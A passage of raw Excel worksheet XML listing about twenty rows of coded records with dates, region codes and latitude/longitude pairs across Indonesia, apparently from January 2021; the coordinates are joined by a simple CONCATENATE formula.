      <c r="I2741" t="s">
        <v>666</v>
      </c>
      <c r="J2741" t="s">
        <v>6509</v>
      </c>
      <c r="L2741" t="s">
        <v>9275</v>
      </c>
      <c r="M2741">
        <v>6304060007</v>
      </c>
      <c r="N2741">
        <v>6304060</v>
      </c>
      <c r="O2741">
        <v>6304</v>
      </c>
      <c r="P2741">
        <v>63</v>
      </c>
      <c r="Q2741" t="s">
        <v>8849</v>
      </c>
      <c r="R2741" t="s">
        <v>8850</v>
      </c>
      <c r="S2741" t="s">
        <v>8851</v>
      </c>
      <c r="T2741" t="s">
        <v>6513</v>
      </c>
      <c r="U2741" s="5">
        <v>11461059</v>
      </c>
      <c r="V2741" s="5" t="s">
        <v>16915</v>
      </c>
      <c r="W2741" s="5">
        <v>-327724</v>
      </c>
      <c r="X2741" t="s">
        <v>20654</v>
      </c>
      <c r="Y2741" t="str">
        <f t="shared" si="42"/>
        <v>-3.27724,114.61059</v>
      </c>
    </row>
    <row r="2742" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2742">
        <v>226422</v>
      </c>
      <c r="B2742" s="1">
        <v>44215</v>
      </c>
      <c r="C2742" s="2">
        <v>0.18927083333333336</v>
      </c>
      <c r="D2742" t="s">
        <v>22</v>
      </c>
      <c r="E2742" t="s">
        <v>23</v>
      </c>
      <c r="F2742" t="s">
        <v>9276</v>
      </c>
      <c r="G2742" t="s">
        <v>9277</v>
      </c>
      <c r="H2742" t="s">
        <v>26</v>
      </c>
      <c r="I2742" t="s">
        <v>193</v>
      </c>
      <c r="J2742" t="s">
        <v>9278</v>
      </c>
      <c r="L2742" t="s">
        <v>9279</v>
      </c>
      <c r="M2742">
        <v>3174030006</v>
      </c>
      <c r="N2742">
        <v>3174030</v>
      </c>
      <c r="O2742">
        <v>3174</v>
      </c>
      <c r="P2742">
        <v>31</v>
      </c>
      <c r="Q2742" t="s">
        <v>2529</v>
      </c>
      <c r="R2742" t="s">
        <v>1487</v>
      </c>
      <c r="S2742" t="s">
        <v>32</v>
      </c>
      <c r="T2742" t="s">
        <v>33</v>
      </c>
      <c r="U2742" s="5">
        <v>10679894</v>
      </c>
      <c r="V2742" s="5" t="s">
        <v>16916</v>
      </c>
      <c r="W2742" s="5">
        <v>-617955</v>
      </c>
      <c r="X2742" t="s">
        <v>20655</v>
      </c>
      <c r="Y2742" t="str">
        <f t="shared" si="42"/>
        <v>-6.17955,106.79894</v>
      </c>
    </row>
    <row r="2743" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2743">
        <v>226429</v>
      </c>
      <c r="B2743" s="1">
        <v>44215</v>
      </c>
      <c r="C2743" s="2">
        <v>0.33246527777777779</v>
      </c>
      <c r="D2743" t="s">
        <v>22</v>
      </c>
      <c r="E2743" t="s">
        <v>23</v>
      </c>
      <c r="F2743" t="s">
        <v>9280</v>
      </c>
      <c r="G2743" t="s">
        <v>9281</v>
      </c>
      <c r="H2743" t="s">
        <v>26</v>
      </c>
      <c r="I2743" t="s">
        <v>979</v>
      </c>
      <c r="J2743" t="s">
        <v>6509</v>
      </c>
      <c r="L2743" t="s">
        <v>9282</v>
      </c>
      <c r="M2743">
        <v>6304070008</v>
      </c>
      <c r="N2743">
        <v>6304070</v>
      </c>
      <c r="O2743">
        <v>6304</v>
      </c>
      <c r="P2743">
        <v>63</v>
      </c>
      <c r="Q2743" t="s">
        <v>9283</v>
      </c>
      <c r="R2743" t="s">
        <v>9284</v>
      </c>
      <c r="S2743" t="s">
        <v>8851</v>
      </c>
      <c r="T2743" t="s">
        <v>6513</v>
      </c>
      <c r="U2743" s="5">
        <v>11466096</v>
      </c>
      <c r="V2743" s="5" t="s">
        <v>16917</v>
      </c>
      <c r="W2743" s="5">
        <v>-315678</v>
      </c>
      <c r="X2743" t="s">
        <v>20656</v>
      </c>
      <c r="Y2743" t="str">
        <f t="shared" si="42"/>
        <v>-3.15678,114.66096</v>
      </c>
    </row>
    <row r="2744" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2744">
        <v>226430</v>
      </c>
      <c r="B2744" s="1">
        <v>44215</v>
      </c>
      <c r="C2744" s="2">
        <v>0.34953703703703703</v>
      </c>
      <c r="D2744" t="s">
        <v>22</v>
      </c>
      <c r="E2744" t="s">
        <v>23</v>
      </c>
      <c r="F2744" t="s">
        <v>9285</v>
      </c>
      <c r="G2744" t="s">
        <v>9286</v>
      </c>
      <c r="H2744" t="s">
        <v>26</v>
      </c>
      <c r="I2744" t="s">
        <v>76</v>
      </c>
      <c r="J2744" t="s">
        <v>2622</v>
      </c>
      <c r="L2744" t="s">
        <v>9287</v>
      </c>
      <c r="M2744">
        <v>3573010009</v>
      </c>
      <c r="N2744">
        <v>3573010</v>
      </c>
      <c r="O2744">
        <v>3573</v>
      </c>
      <c r="P2744">
        <v>35</v>
      </c>
      <c r="Q2744" t="s">
        <v>9288</v>
      </c>
      <c r="R2744" t="s">
        <v>7408</v>
      </c>
      <c r="S2744" t="s">
        <v>6321</v>
      </c>
      <c r="T2744" t="s">
        <v>1221</v>
      </c>
      <c r="U2744" s="5">
        <v>11265928</v>
      </c>
      <c r="V2744" s="5" t="s">
        <v>16918</v>
      </c>
      <c r="W2744" s="5">
        <v>-796605</v>
      </c>
      <c r="X2744" t="s">
        <v>20657</v>
      </c>
      <c r="Y2744" t="str">
        <f t="shared" si="42"/>
        <v>-7.96605,112.65928</v>
      </c>
    </row>
    <row r="2745" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2745">
        <v>226431</v>
      </c>
      <c r="B2745" s="1">
        <v>44215</v>
      </c>
      <c r="C2745" s="2">
        <v>0.53039351851851857</v>
      </c>
      <c r="D2745" t="s">
        <v>22</v>
      </c>
      <c r="E2745" t="s">
        <v>23</v>
      </c>
      <c r="F2745" t="s">
        <v>9289</v>
      </c>
      <c r="G2745" t="s">
        <v>9290</v>
      </c>
      <c r="H2745" t="s">
        <v>26</v>
      </c>
      <c r="I2745" t="s">
        <v>9291</v>
      </c>
      <c r="J2745" t="s">
        <v>2622</v>
      </c>
      <c r="L2745" t="s">
        <v>9292</v>
      </c>
      <c r="M2745">
        <v>3524190004</v>
      </c>
      <c r="N2745">
        <v>3524190</v>
      </c>
      <c r="O2745">
        <v>3524</v>
      </c>
      <c r="P2745">
        <v>35</v>
      </c>
      <c r="Q2745" t="s">
        <v>9293</v>
      </c>
      <c r="R2745" t="s">
        <v>8712</v>
      </c>
      <c r="S2745" t="s">
        <v>8713</v>
      </c>
      <c r="T2745" t="s">
        <v>1221</v>
      </c>
      <c r="U2745" s="5">
        <v>11238052</v>
      </c>
      <c r="V2745" s="5" t="s">
        <v>16919</v>
      </c>
      <c r="W2745" s="5">
        <v>-702634</v>
      </c>
      <c r="X2745" t="s">
        <v>20658</v>
      </c>
      <c r="Y2745" t="str">
        <f t="shared" si="42"/>
        <v>-7.02634,112.38052</v>
      </c>
    </row>
    <row r="2746" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2746">
        <v>226434</v>
      </c>
      <c r="B2746" s="1">
        <v>44215</v>
      </c>
      <c r="C2746" s="2">
        <v>0.58086805555555554</v>
      </c>
      <c r="D2746" t="s">
        <v>22</v>
      </c>
      <c r="E2746" t="s">
        <v>23</v>
      </c>
      <c r="F2746" t="s">
        <v>9294</v>
      </c>
      <c r="G2746" t="s">
        <v>9295</v>
      </c>
      <c r="H2746" t="s">
        <v>26</v>
      </c>
      <c r="I2746" t="s">
        <v>473</v>
      </c>
      <c r="J2746" t="s">
        <v>6509</v>
      </c>
      <c r="L2746" t="s">
        <v>9296</v>
      </c>
      <c r="M2746">
        <v>6303040001</v>
      </c>
      <c r="N2746">
        <v>6303040</v>
      </c>
      <c r="O2746">
        <v>6303</v>
      </c>
      <c r="P2746">
        <v>63</v>
      </c>
      <c r="Q2746" t="s">
        <v>8808</v>
      </c>
      <c r="R2746" t="s">
        <v>8809</v>
      </c>
      <c r="S2746" t="s">
        <v>8751</v>
      </c>
      <c r="T2746" t="s">
        <v>6513</v>
      </c>
      <c r="U2746" s="5">
        <v>11464008</v>
      </c>
      <c r="V2746" s="5" t="s">
        <v>16920</v>
      </c>
      <c r="W2746" s="5">
        <v>-331366</v>
      </c>
      <c r="X2746" t="s">
        <v>20659</v>
      </c>
      <c r="Y2746" t="str">
        <f t="shared" si="42"/>
        <v>-3.31366,114.64008</v>
      </c>
    </row>
    <row r="2747" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2747">
        <v>226435</v>
      </c>
      <c r="B2747" s="1">
        <v>44215</v>
      </c>
      <c r="C2747" s="2">
        <v>0.67297453703703702</v>
      </c>
      <c r="D2747" t="s">
        <v>22</v>
      </c>
      <c r="E2747" t="s">
        <v>23</v>
      </c>
      <c r="F2747" t="s">
        <v>9297</v>
      </c>
      <c r="G2747" t="s">
        <v>9298</v>
      </c>
      <c r="H2747" t="s">
        <v>26</v>
      </c>
      <c r="I2747" t="s">
        <v>137</v>
      </c>
      <c r="J2747" t="s">
        <v>7171</v>
      </c>
      <c r="L2747" t="s">
        <v>9299</v>
      </c>
      <c r="M2747">
        <v>6404011003</v>
      </c>
      <c r="N2747">
        <v>6404011</v>
      </c>
      <c r="O2747">
        <v>6404</v>
      </c>
      <c r="P2747">
        <v>64</v>
      </c>
      <c r="Q2747" t="s">
        <v>9300</v>
      </c>
      <c r="R2747" t="s">
        <v>9301</v>
      </c>
      <c r="S2747" t="s">
        <v>9302</v>
      </c>
      <c r="T2747" t="s">
        <v>1308</v>
      </c>
      <c r="U2747" s="5">
        <v>11624199</v>
      </c>
      <c r="V2747" s="5" t="s">
        <v>16921</v>
      </c>
      <c r="W2747" s="5">
        <v>78879</v>
      </c>
      <c r="X2747" t="s">
        <v>14450</v>
      </c>
      <c r="Y2747" t="str">
        <f t="shared" si="42"/>
        <v>0.78879,116.24199</v>
      </c>
    </row>
    <row r="2748" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2748">
        <v>226440</v>
      </c>
      <c r="B2748" s="1">
        <v>44216</v>
      </c>
      <c r="C2748" s="2">
        <v>0.6416087962962963</v>
      </c>
      <c r="D2748" t="s">
        <v>22</v>
      </c>
      <c r="E2748" t="s">
        <v>23</v>
      </c>
      <c r="F2748" t="s">
        <v>9303</v>
      </c>
      <c r="G2748" t="s">
        <v>9304</v>
      </c>
      <c r="H2748" t="s">
        <v>26</v>
      </c>
      <c r="I2748" t="s">
        <v>137</v>
      </c>
      <c r="J2748" t="s">
        <v>6509</v>
      </c>
      <c r="M2748">
        <v>6371020004</v>
      </c>
      <c r="N2748">
        <v>6371020</v>
      </c>
      <c r="O2748">
        <v>6371</v>
      </c>
      <c r="P2748">
        <v>63</v>
      </c>
      <c r="Q2748" t="s">
        <v>8808</v>
      </c>
      <c r="R2748" t="s">
        <v>8795</v>
      </c>
      <c r="S2748" t="s">
        <v>6512</v>
      </c>
      <c r="T2748" t="s">
        <v>6513</v>
      </c>
      <c r="U2748" s="5">
        <v>11463584</v>
      </c>
      <c r="V2748" s="5" t="s">
        <v>16922</v>
      </c>
      <c r="W2748" s="5">
        <v>-334107</v>
      </c>
      <c r="X2748" t="s">
        <v>20660</v>
      </c>
      <c r="Y2748" t="str">
        <f t="shared" si="42"/>
        <v>-3.34107,114.63584</v>
      </c>
    </row>
    <row r="2749" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2749">
        <v>226441</v>
      </c>
      <c r="B2749" s="1">
        <v>44216</v>
      </c>
      <c r="C2749" s="2">
        <v>0.73496527777777787</v>
      </c>
      <c r="D2749" t="s">
        <v>22</v>
      </c>
      <c r="E2749" t="s">
        <v>23</v>
      </c>
      <c r="F2749" t="s">
        <v>9305</v>
      </c>
      <c r="G2749" t="s">
        <v>9306</v>
      </c>
      <c r="H2749" t="s">
        <v>26</v>
      </c>
      <c r="I2749" t="s">
        <v>1240</v>
      </c>
      <c r="J2749" t="s">
        <v>7436</v>
      </c>
      <c r="L2749" t="s">
        <v>9307</v>
      </c>
      <c r="M2749">
        <v>6101070002</v>
      </c>
      <c r="N2749">
        <v>6101070</v>
      </c>
      <c r="O2749">
        <v>6101</v>
      </c>
      <c r="P2749">
        <v>61</v>
      </c>
      <c r="Q2749" t="s">
        <v>9308</v>
      </c>
      <c r="R2749" t="s">
        <v>9309</v>
      </c>
      <c r="S2749" t="s">
        <v>9310</v>
      </c>
      <c r="T2749" t="s">
        <v>7441</v>
      </c>
      <c r="U2749" s="5">
        <v>10946997</v>
      </c>
      <c r="V2749" s="5" t="s">
        <v>16923</v>
      </c>
      <c r="W2749" s="5">
        <v>141439</v>
      </c>
      <c r="X2749" t="s">
        <v>20661</v>
      </c>
      <c r="Y2749" t="str">
        <f t="shared" si="42"/>
        <v>1.41439,109.46997</v>
      </c>
    </row>
    <row r="2750" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2750">
        <v>226442</v>
      </c>
      <c r="B2750" s="1">
        <v>44216</v>
      </c>
      <c r="C2750" s="2">
        <v>0.99465277777777772</v>
      </c>
      <c r="D2750" t="s">
        <v>22</v>
      </c>
      <c r="E2750" t="s">
        <v>23</v>
      </c>
      <c r="F2750" t="s">
        <v>9311</v>
      </c>
      <c r="G2750" t="s">
        <v>9312</v>
      </c>
      <c r="H2750" t="s">
        <v>26</v>
      </c>
      <c r="I2750" t="s">
        <v>1240</v>
      </c>
      <c r="J2750" t="s">
        <v>7436</v>
      </c>
      <c r="L2750" t="s">
        <v>9313</v>
      </c>
      <c r="M2750">
        <v>6101070002</v>
      </c>
      <c r="N2750">
        <v>6101070</v>
      </c>
      <c r="O2750">
        <v>6101</v>
      </c>
      <c r="P2750">
        <v>61</v>
      </c>
      <c r="Q2750" t="s">
        <v>9308</v>
      </c>
      <c r="R2750" t="s">
        <v>9309</v>
      </c>
      <c r="S2750" t="s">
        <v>9310</v>
      </c>
      <c r="T2750" t="s">
        <v>7441</v>
      </c>
      <c r="U2750" s="5">
        <v>10946998</v>
      </c>
      <c r="V2750" s="5" t="s">
        <v>16924</v>
      </c>
      <c r="W2750" s="5">
        <v>141460</v>
      </c>
      <c r="X2750" t="s">
        <v>20662</v>
      </c>
      <c r="Y2750" t="str">
        <f t="shared" si="42"/>
        <v>1.41460,109.46998</v>
      </c>
    </row>
    <row r="2751" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2751">
        <v>226443</v>
      </c>
      <c r="B2751" s="1">
        <v>44217</v>
      </c>
      <c r="C2751" s="2">
        <v>8.7604166666666664E-2</v>
      </c>
      <c r="D2751" t="s">
        <v>22</v>
      </c>
      <c r="E2751" t="s">
        <v>23</v>
      </c>
      <c r="F2751" t="s">
        <v>9314</v>
      </c>
      <c r="G2751" t="s">
        <v>9315</v>
      </c>
      <c r="H2751" t="s">
        <v>26</v>
      </c>
      <c r="I2751" t="s">
        <v>3116</v>
      </c>
      <c r="J2751" t="s">
        <v>9316</v>
      </c>
      <c r="L2751" t="s">
        <v>9317</v>
      </c>
      <c r="M2751">
        <v>9410030003</v>
      </c>
      <c r="N2751">
        <v>9410030</v>
      </c>
      <c r="O2751">
        <v>9410</v>
      </c>
      <c r="P2751">
        <v>94</v>
      </c>
      <c r="Q2751" t="s">
        <v>9318</v>
      </c>
      <c r="R2751" t="s">
        <v>9319</v>
      </c>
      <c r="S2751" t="s">
        <v>9320</v>
      </c>
      <c r="T2751" t="s">
        <v>9321</v>
      </c>
      <c r="U2751" s="5">
        <v>13637667</v>
      </c>
      <c r="V2751" s="5" t="s">
        <v>16925</v>
      </c>
      <c r="W2751" s="5">
        <v>-392845</v>
      </c>
      <c r="X2751" t="s">
        <v>20663</v>
      </c>
      <c r="Y2751" t="str">
        <f t="shared" si="42"/>
        <v>-3.92845,136.37667</v>
      </c>
    </row>
    <row r="2752" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2752">
        <v>226444</v>
      </c>
      <c r="B2752" s="1">
        <v>44217</v>
      </c>
      <c r="C2752" s="2">
        <v>8.3333333333333329E-2</v>
      </c>
      <c r="D2752" t="s">
        <v>2648</v>
      </c>
      <c r="E2752" t="s">
        <v>23</v>
      </c>
      <c r="G2752" t="s">
        <v>9322</v>
      </c>
      <c r="H2752" t="s">
        <v>26</v>
      </c>
      <c r="J2752" t="s">
        <v>9323</v>
      </c>
      <c r="L2752" t="s">
        <v>9324</v>
      </c>
      <c r="M2752">
        <v>3175030003</v>
      </c>
      <c r="N2752">
        <v>3175030</v>
      </c>
      <c r="O2752">
        <v>3175</v>
      </c>
      <c r="P2752">
        <v>31</v>
      </c>
      <c r="Q2752" t="s">
        <v>7451</v>
      </c>
      <c r="R2752" t="s">
        <v>1563</v>
      </c>
      <c r="S2752" t="s">
        <v>547</v>
      </c>
      <c r="T2752" t="s">
        <v>33</v>
      </c>
      <c r="U2752" s="5">
        <v>10687224</v>
      </c>
      <c r="V2752" s="5" t="s">
        <v>16926</v>
      </c>
      <c r="W2752" s="5">
        <v>-613182</v>
      </c>
      <c r="X2752" t="s">
        <v>20664</v>
      </c>
      <c r="Y2752" t="str">
        <f t="shared" si="42"/>
        <v>-6.13182,106.87224</v>
      </c>
    </row>
    <row r="2753" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2753">
        <v>226454</v>
      </c>
      <c r="B2753" s="1">
        <v>44217</v>
      </c>
      <c r="C2753" s="2">
        <v>0.14390046296296297</v>
      </c>
      <c r="D2753" t="s">
        <v>22</v>
      </c>
      <c r="E2753" t="s">
        <v>23</v>
      </c>
      <c r="F2753" t="s">
        <v>9325</v>
      </c>
      <c r="G2753" t="s">
        <v>9326</v>
      </c>
      <c r="H2753" t="s">
        <v>26</v>
      </c>
      <c r="I2753" t="s">
        <v>1055</v>
      </c>
      <c r="J2753" t="s">
        <v>6509</v>
      </c>
      <c r="L2753" t="s">
        <v>9327</v>
      </c>
      <c r="M2753">
        <v>6301060021</v>
      </c>
      <c r="N2753">
        <v>6301060</v>
      </c>
      <c r="O2753">
        <v>6301</v>
      </c>
      <c r="P2753">
        <v>63</v>
      </c>
      <c r="Q2753" t="s">
        <v>9328</v>
      </c>
      <c r="R2753" t="s">
        <v>7536</v>
      </c>
      <c r="S2753" t="s">
        <v>7537</v>
      </c>
      <c r="T2753" t="s">
        <v>6513</v>
      </c>
      <c r="U2753" s="5">
        <v>11469646</v>
      </c>
      <c r="V2753" s="5" t="s">
        <v>16927</v>
      </c>
      <c r="W2753" s="5">
        <v>-375703</v>
      </c>
      <c r="X2753" t="s">
        <v>20665</v>
      </c>
      <c r="Y2753" t="str">
        <f t="shared" si="42"/>
        <v>-3.75703,114.69646</v>
      </c>
    </row>
    <row r="2754" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2754">
        <v>226550</v>
      </c>
      <c r="B2754" s="1">
        <v>44217</v>
      </c>
      <c r="C2754" s="2">
        <v>0.47085648148148151</v>
      </c>
      <c r="D2754" t="s">
        <v>22</v>
      </c>
      <c r="E2754" t="s">
        <v>23</v>
      </c>
      <c r="F2754" t="s">
        <v>9329</v>
      </c>
      <c r="G2754" t="s">
        <v>9330</v>
      </c>
      <c r="H2754" t="s">
        <v>7086</v>
      </c>
      <c r="I2754" t="s">
        <v>9331</v>
      </c>
      <c r="J2754" t="s">
        <v>2622</v>
      </c>
      <c r="L2754" t="s">
        <v>9332</v>
      </c>
      <c r="M2754">
        <v>3515160009</v>
      </c>
      <c r="N2754">
        <v>3515160</v>
      </c>
      <c r="O2754">
        <v>3515</v>
      </c>
      <c r="P2754">
        <v>35</v>
      </c>
      <c r="Q2754" t="s">
        <v>7246</v>
      </c>
      <c r="R2754" t="s">
        <v>9333</v>
      </c>
      <c r="S2754" t="s">
        <v>1928</v>
      </c>
      <c r="T2754" t="s">
        <v>1221</v>
      </c>
      <c r="U2754" s="5">
        <v>11266657</v>
      </c>
      <c r="V2754" s="5" t="s">
        <v>16928</v>
      </c>
      <c r="W2754" s="5">
        <v>-735294</v>
      </c>
      <c r="X2754" t="s">
        <v>20666</v>
      </c>
      <c r="Y2754" t="str">
        <f t="shared" si="42"/>
        <v>-7.35294,112.66657</v>
      </c>
    </row>
    <row r="2755" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2755">
        <v>226551</v>
      </c>
      <c r="B2755" s="1">
        <v>44217</v>
      </c>
      <c r="C2755" s="2">
        <v>0.47212962962962962</v>
      </c>
      <c r="D2755" t="s">
        <v>22</v>
      </c>
      <c r="E2755" t="s">
        <v>23</v>
      </c>
      <c r="F2755" t="s">
        <v>9334</v>
      </c>
      <c r="H2755" t="s">
        <v>7086</v>
      </c>
      <c r="I2755" t="s">
        <v>7421</v>
      </c>
      <c r="J2755" t="s">
        <v>2622</v>
      </c>
      <c r="L2755" t="s">
        <v>9335</v>
      </c>
      <c r="M2755">
        <v>3515160009</v>
      </c>
      <c r="N2755">
        <v>3515160</v>
      </c>
      <c r="O2755">
        <v>3515</v>
      </c>
      <c r="P2755">
        <v>35</v>
      </c>
      <c r="Q2755" t="s">
        <v>7246</v>
      </c>
      <c r="R2755" t="s">
        <v>9333</v>
      </c>
      <c r="S2755" t="s">
        <v>1928</v>
      </c>
      <c r="T2755" t="s">
        <v>1221</v>
      </c>
      <c r="U2755" s="5">
        <v>11266657</v>
      </c>
      <c r="V2755" s="5" t="s">
        <v>16928</v>
      </c>
      <c r="W2755" s="5">
        <v>-735294</v>
      </c>
      <c r="X2755" t="s">
        <v>20666</v>
      </c>
      <c r="Y2755" t="str">
        <f t="shared" ref="Y2755:Y2818" si="43">CONCATENATE(X2755,",",V2755)</f>
        <v>-7.35294,112.66657</v>
      </c>
    </row>
    <row r="2756" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2756">
        <v>226553</v>
      </c>
      <c r="B2756" s="1">
        <v>44217</v>
      </c>
      <c r="C2756" s="2">
        <v>0.47619212962962965</v>
      </c>
      <c r="D2756" t="s">
        <v>22</v>
      </c>
      <c r="E2756" t="s">
        <v>23</v>
      </c>
      <c r="F2756" t="s">
        <v>9336</v>
      </c>
      <c r="G2756" t="s">
        <v>9337</v>
      </c>
      <c r="H2756" t="s">
        <v>7086</v>
      </c>
      <c r="I2756" t="s">
        <v>7087</v>
      </c>
      <c r="J2756" t="s">
        <v>2622</v>
      </c>
      <c r="L2756" t="s">
        <v>9338</v>
      </c>
      <c r="M2756">
        <v>3515160009</v>
      </c>
      <c r="N2756">
        <v>3515160</v>
      </c>
      <c r="O2756">
        <v>3515</v>
      </c>
      <c r="P2756">
        <v>35</v>
      </c>
      <c r="Q2756" t="s">
        <v>7246</v>
      </c>
      <c r="R2756" t="s">
        <v>9333</v>
      </c>
      <c r="S2756" t="s">
        <v>1928</v>
      </c>
      <c r="T2756" t="s">
        <v>1221</v>
      </c>
      <c r="U2756" s="5">
        <v>11266630</v>
      </c>
      <c r="V2756" s="5" t="s">
        <v>16929</v>
      </c>
      <c r="W2756" s="5">
        <v>-735272</v>
      </c>
      <c r="X2756" t="s">
        <v>20667</v>
      </c>
      <c r="Y2756" t="str">
        <f t="shared" si="43"/>
        <v>-7.35272,112.66630</v>
      </c>
    </row>
    <row r="2757" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2757">
        <v>226555</v>
      </c>
      <c r="B2757" s="1">
        <v>44217</v>
      </c>
      <c r="C2757" s="2">
        <v>0.47672453703703704</v>
      </c>
      <c r="D2757" t="s">
        <v>22</v>
      </c>
      <c r="E2757" t="s">
        <v>23</v>
      </c>
      <c r="F2757" t="s">
        <v>9339</v>
      </c>
      <c r="H2757" t="s">
        <v>7086</v>
      </c>
      <c r="I2757" t="s">
        <v>9331</v>
      </c>
      <c r="J2757" t="s">
        <v>2622</v>
      </c>
      <c r="L2757" t="s">
        <v>9340</v>
      </c>
      <c r="M2757">
        <v>3515160009</v>
      </c>
      <c r="N2757">
        <v>3515160</v>
      </c>
      <c r="O2757">
        <v>3515</v>
      </c>
      <c r="P2757">
        <v>35</v>
      </c>
      <c r="Q2757" t="s">
        <v>7246</v>
      </c>
      <c r="R2757" t="s">
        <v>9333</v>
      </c>
      <c r="S2757" t="s">
        <v>1928</v>
      </c>
      <c r="T2757" t="s">
        <v>1221</v>
      </c>
      <c r="U2757" s="5">
        <v>11266621</v>
      </c>
      <c r="V2757" s="5" t="s">
        <v>16930</v>
      </c>
      <c r="W2757" s="5">
        <v>-735251</v>
      </c>
      <c r="X2757" t="s">
        <v>20668</v>
      </c>
      <c r="Y2757" t="str">
        <f t="shared" si="43"/>
        <v>-7.35251,112.66621</v>
      </c>
    </row>
    <row r="2758" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2758">
        <v>226722</v>
      </c>
      <c r="B2758" s="1">
        <v>44218</v>
      </c>
      <c r="C2758" s="2">
        <v>4.3796296296296298E-2</v>
      </c>
      <c r="D2758" t="s">
        <v>22</v>
      </c>
      <c r="E2758" t="s">
        <v>23</v>
      </c>
      <c r="F2758" t="s">
        <v>9341</v>
      </c>
      <c r="G2758" t="s">
        <v>9342</v>
      </c>
      <c r="H2758" t="s">
        <v>26</v>
      </c>
      <c r="I2758" t="s">
        <v>1389</v>
      </c>
      <c r="J2758" t="s">
        <v>6509</v>
      </c>
      <c r="L2758" t="s">
        <v>9343</v>
      </c>
      <c r="M2758">
        <v>6371040008</v>
      </c>
      <c r="N2758">
        <v>6371040</v>
      </c>
      <c r="O2758">
        <v>6371</v>
      </c>
      <c r="P2758">
        <v>63</v>
      </c>
      <c r="Q2758" t="s">
        <v>8919</v>
      </c>
      <c r="R2758" t="s">
        <v>8782</v>
      </c>
      <c r="S2758" t="s">
        <v>6512</v>
      </c>
      <c r="T2758" t="s">
        <v>6513</v>
      </c>
      <c r="U2758" s="5">
        <v>11462951</v>
      </c>
      <c r="V2758" s="5" t="s">
        <v>16931</v>
      </c>
      <c r="W2758" s="5">
        <v>-328914</v>
      </c>
      <c r="X2758" t="s">
        <v>20669</v>
      </c>
      <c r="Y2758" t="str">
        <f t="shared" si="43"/>
        <v>-3.28914,114.62951</v>
      </c>
    </row>
    <row r="2759" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2759">
        <v>226734</v>
      </c>
      <c r="B2759" s="1">
        <v>44218</v>
      </c>
      <c r="C2759" s="2">
        <v>8.2557870370370365E-2</v>
      </c>
      <c r="D2759" t="s">
        <v>22</v>
      </c>
      <c r="E2759" t="s">
        <v>23</v>
      </c>
      <c r="F2759" t="s">
        <v>9344</v>
      </c>
      <c r="G2759" t="s">
        <v>9345</v>
      </c>
      <c r="H2759" t="s">
        <v>26</v>
      </c>
      <c r="I2759" t="s">
        <v>9346</v>
      </c>
      <c r="J2759" t="s">
        <v>2622</v>
      </c>
      <c r="L2759" t="s">
        <v>9347</v>
      </c>
      <c r="M2759">
        <v>3571010007</v>
      </c>
      <c r="N2759">
        <v>3571010</v>
      </c>
      <c r="O2759">
        <v>3571</v>
      </c>
      <c r="P2759">
        <v>35</v>
      </c>
      <c r="Q2759" t="s">
        <v>9255</v>
      </c>
      <c r="R2759" t="s">
        <v>8660</v>
      </c>
      <c r="S2759" t="s">
        <v>8365</v>
      </c>
      <c r="T2759" t="s">
        <v>1221</v>
      </c>
      <c r="U2759" s="5">
        <v>11200768</v>
      </c>
      <c r="V2759" s="5" t="s">
        <v>16932</v>
      </c>
      <c r="W2759" s="5">
        <v>-782257</v>
      </c>
      <c r="X2759" t="s">
        <v>20670</v>
      </c>
      <c r="Y2759" t="str">
        <f t="shared" si="43"/>
        <v>-7.82257,112.00768</v>
      </c>
    </row>
    <row r="2760" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2760">
        <v>226764</v>
      </c>
      <c r="B2760" s="1">
        <v>44218</v>
      </c>
      <c r="C2760" s="2">
        <v>0.15780092592592593</v>
      </c>
      <c r="D2760" t="s">
        <v>22</v>
      </c>
      <c r="E2760" t="s">
        <v>23</v>
      </c>
      <c r="F2760" t="s">
        <v>9348</v>
      </c>
      <c r="G2760" t="s">
        <v>9349</v>
      </c>
      <c r="H2760" t="s">
        <v>9262</v>
      </c>
      <c r="I2760" t="s">
        <v>9350</v>
      </c>
      <c r="J2760" t="s">
        <v>2627</v>
      </c>
      <c r="L2760" t="s">
        <v>9351</v>
      </c>
      <c r="M2760">
        <v>3217120008</v>
      </c>
      <c r="N2760">
        <v>3217120</v>
      </c>
      <c r="O2760">
        <v>3217</v>
      </c>
      <c r="P2760">
        <v>32</v>
      </c>
      <c r="Q2760" t="s">
        <v>9352</v>
      </c>
      <c r="R2760" t="s">
        <v>9353</v>
      </c>
      <c r="S2760" t="s">
        <v>9354</v>
      </c>
      <c r="T2760" t="s">
        <v>42</v>
      </c>
      <c r="U2760" s="5">
        <v>10761203</v>
      </c>
      <c r="V2760" s="5" t="s">
        <v>16933</v>
      </c>
      <c r="W2760" s="5">
        <v>-675987</v>
      </c>
      <c r="X2760" t="s">
        <v>20671</v>
      </c>
      <c r="Y2760" t="str">
        <f t="shared" si="43"/>
        <v>-6.75987,107.61203</v>
      </c>
    </row>
    <row r="2761" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2761">
        <v>226771</v>
      </c>
      <c r="B2761" s="1">
        <v>44218</v>
      </c>
      <c r="C2761" s="2">
        <v>0.16695601851851852</v>
      </c>
      <c r="D2761" t="s">
        <v>22</v>
      </c>
      <c r="E2761" t="s">
        <v>23</v>
      </c>
      <c r="F2761" t="s">
        <v>9355</v>
      </c>
      <c r="H2761" t="s">
        <v>7086</v>
      </c>
      <c r="I2761" t="s">
        <v>9356</v>
      </c>
      <c r="J2761" t="s">
        <v>2627</v>
      </c>
      <c r="L2761" t="s">
        <v>9357</v>
      </c>
      <c r="M2761">
        <v>3273150002</v>
      </c>
      <c r="N2761">
        <v>3273150</v>
      </c>
      <c r="O2761">
        <v>3273</v>
      </c>
      <c r="P2761">
